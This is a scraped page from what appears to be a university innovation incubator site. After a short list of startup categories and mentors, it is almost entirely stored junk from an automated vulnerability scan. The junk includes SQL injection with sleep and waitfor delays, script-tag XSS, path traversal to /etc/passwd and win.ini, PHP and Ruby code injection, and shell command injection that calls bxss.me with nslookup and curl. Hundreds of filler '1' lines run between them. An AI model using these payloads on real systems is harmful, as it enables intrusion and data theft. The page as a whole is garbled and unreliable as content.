Click on the list of our aspiring Thomasian innovators and discover their potential!
FOOD
MICROBIOLOGY
INTERNET OF THINGS
REHABILITATION SCIENCES
REHABILITATION SCIENCES
REHABILITATION SCIENCES
REHABILITATION SCIENCES
FOOD TECHNOLOGY
FOOD
SOCIAL INNOVATION
Meet our pool of best mentors for the incubation program who have the passion and the heart for innovation!
Faculty, College of Commerce and Business Administration
CEO & Founder, Brand Guerilla PH
Founder, Sales Hacker PH Co-founder, SAGE
CEO & Co-founder, Giving Hero
CEO & Founder, The Tennis Foodie
Manager, UST Innovation and Technology Support Office
Chief Operations Officer, DMD Skin Sciences
Software Developer, AgencyMVP
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1<esi:include src="http://bxss.me/rpb.png"/>
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'?
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
1
Http://bxss.me/t/fit.txt
1
1
http://bxss.me/t/fit.txt%3F.jpg
1
1
/etc/shells
1
c:/windows/win.ini
1
1
bxss.me
1
1
1
1
1
1
1
${9999935+10000374}
1
1
1
1
#{9999935+10000374}
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1&n992248=v909771
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
../../../../../../../../../../../../../../etc/passwd
1
1
../../../../../../../../../../../../../../windows/win.ini
)
1
1
file:///etc/passwd
!(()&&!|*|*|
1
1
1
^(#$!@#$)(()))******
1
1
../1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'"()
1
1
1'&&sleep(27*1000)*jkwpxy&&'
1
1
1"&&sleep(27*1000)*jvbtlp&&"
1
1
1'||sleep(27*1000)*biqufv||'
1
1"||sleep(27*1000)*usnzza||"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'.gethostbyname(lc('hitoc'.'sjlojvzz0f23f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(83).chr(100).chr(72).'
1
1
1
".gethostbyname(lc("hitpc"."ryoxmxeb35f3a.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(82).chr(122).chr(76)."
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
1
1
';print(md5(31337));$a='
1
1
1
1
";print(md5(31337));$a="
1
1
${@print(md5(31337))}
1
1
1
${@print(md5(31337))}\
1
1
'.print(md5(31337)).'
1
xfs.bxss.me
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
HttP://bxss.me/t/xss.html?%00
1
1
bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
1
1
1
1
1
1
"+"A".concat(70-3).concat(22*4).concat(105).concat(70).concat(104).concat(74)+(require"socket" Socket.gethostbyname("hitiq"+"tahfjywk67107.bxss.me.")[3].to_s)+"
1
'+'A'.concat(70-3).concat(22*4).concat(98).concat(85).concat(101).concat(80)+(require'socket' Socket.gethostbyname('hitsg'+'vxyapwmv85466.bxss.me.')[3].to_s)+'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'"
1
1
1
1
<!--
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'"()&%<zzz><ScRiPt >I2qh(9881)</ScRiPt>
1
1
1
'"()&%<zzz><ScRiPt >I2qh(9263)</ScRiPt>
1
1
1
19154467
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
response.write(9552958*9443771)
1
1
1
1
1
'+response.write(9552958*9443771)+'
1
1
1
"+response.write(9552958*9443771)+"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
YcdzNzmQ
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'?
1
1
1
1
1
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1
1
echo zjavjf$()\ axwiyi\nz^xyu||a #' &echo zjavjf$()\ axwiyi\nz^xyu||a #|" &echo zjavjf$()\ axwiyi\nz^xyu||a #
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
1<esi:include src="http://bxss.me/rpb.png"/>
&echo nsbjxi$()\ kmbvzh\nz^xyu||a #' &echo nsbjxi$()\ kmbvzh\nz^xyu||a #|" &echo nsbjxi$()\ kmbvzh\nz^xyu||a #
Http://bxss.me/t/fit.txt
1
1&echo gusqdq$()\ csmcpu\nz^xyu||a #' &echo gusqdq$()\ csmcpu\nz^xyu||a #|" &echo gusqdq$()\ csmcpu\nz^xyu||a #
1
http://bxss.me/t/fit.txt%3F.jpg
1
1
|echo bhxlce$()\ suhoox\nz^xyu||a #' |echo bhxlce$()\ suhoox\nz^xyu||a #|" |echo bhxlce$()\ suhoox\nz^xyu||a #
1
/etc/shells
1
1|echo cavilk$()\ vduksd\nz^xyu||a #' |echo cavilk$()\ vduksd\nz^xyu||a #|" |echo cavilk$()\ vduksd\nz^xyu||a #
c:/windows/win.ini
1
1
1
(nslookup -q=cname hitetvrcmmmdp2aa5d.bxss.me||curl hitetvrcmmmdp2aa5d.bxss.me))
1
bxss.me
1
1
$(nslookup -q=cname hitlutprgqnjad89d6.bxss.me||curl hitlutprgqnjad89d6.bxss.me)
1
1
1
1
&nslookup -q=cname hitcsceovnzure018f.bxss.me&'\"`0&nslookup -q=cname hitcsceovnzure018f.bxss.me&`'
1
1
1
1
&(nslookup -q=cname hitrorctsemod22861.bxss.me||curl hitrorctsemod22861.bxss.me)&'\"`0&(nslookup -q=cname hitrorctsemod22861.bxss.me||curl hitrorctsemod22861.bxss.me)&`'
1
1
|(nslookup -q=cname hitekztzvohghde43a.bxss.me||curl hitekztzvohghde43a.bxss.me)
1
1
1
`(nslookup -q=cname hitnrvhgcxwnzbde73.bxss.me||curl hitnrvhgcxwnzbde73.bxss.me)`
1
1
${10000472+9999406}
1
1
;(nslookup -q=cname hitsuxzqvseyrfcde2.bxss.me||curl hitsuxzqvseyrfcde2.bxss.me)|(nslookup -q=cname hitsuxzqvseyrfcde2.bxss.me||curl hitsuxzqvseyrfcde2.bxss.me)&(nslookup -q=cname hitsuxzqvseyrfcde2.bxss.me||curl hitsuxzqvseyrfcde2.bxss.me)
1
#{10000472+9999406}
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1&n910100=v901507
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
)
1
1
!(()&&!|*|*|
1
1
1
^(#$!@#$)(()))******
1
1
1
1
1
1
1
1
1
../../../../../../../../../../../../../../etc/passwd
1
1
1
1
../../../../../../../../../../../../../../windows/win.ini
1
1
1
1
file:///etc/passwd
1
1
1
1
1
1
1
1
../1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'"()
1
1
1
1'&&sleep(27*1000)*rwvact&&'
1
1
1
1
1"&&sleep(27*1000)*gdyvdm&&"
1
1'||sleep(27*1000)*mnojnj||'
1
1
1"||sleep(27*1000)*khdkai||"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'.gethostbyname(lc('hittj'.'xpkadjnk6dc37.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(85).chr(111).chr(81).'
1
1
1
".gethostbyname(lc("hitdv"."ualmmwrb9a1d4.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(82).chr(117).chr(87)."
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
1
1
1
1
';print(md5(31337));$a='
1
1
1
1
1
";print(md5(31337));$a="
1
1
1
1
${@print(md5(31337))}
1
1
1
1
${@print(md5(31337))}\
1
1
1
'.print(md5(31337)).'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
xfs.bxss.me
1
1
1
1
1
1
1
1
1
1
1OD3WPUd3
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
-1 OR 2+755-755-1=0+0+0+1 --
1
1
1
-1 OR 2+92-92-1=0+0+0+1
1
1
1
1
-1' OR 2+276-276-1=0+0+0+1 --
1
1
1
-1' OR 2+492-492-1=0+0+0+1 or 'kGiy3ERL'='
1
1
1
1
-1" OR 2+744-744-1=0+0+0+1 --
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1*if(now()=sysdate(),sleep(15),0)
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
HttP://bxss.me/t/xss.html?%00
1
1
bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
1
1
1
1
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
1
1
1
1
1
1
1
1
1
1
1
1
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1
1
1
1
1
1
1
1
1
1
1
1-1; waitfor delay '0:0:15' --
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1-1); waitfor delay '0:0:15' --
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
"+"A".concat(70-3).concat(22*4).concat(120).concat(70).concat(101).concat(65)+(require"socket" Socket.gethostbyname("hitqu"+"kccpoftf2635a.bxss.me.")[3].to_s)+"
1
1
1-1 waitfor delay '0:0:15' --
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
'+'A'.concat(70-3).concat(22*4).concat(106).concat(73).concat(117).concat(83)+(require'socket' Socket.gethostbyname('hittg'+'nfxsicxe7fd93.bxss.me.')[3].to_s)+'
1
1
1
1
1
1
1
1
1
1
1
1
1
15mFg7zKR'; waitfor delay '0:0:15' --
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1-1 OR 944=(SELECT 944 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1-1) OR 774=(SELECT 774 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
1
'"
1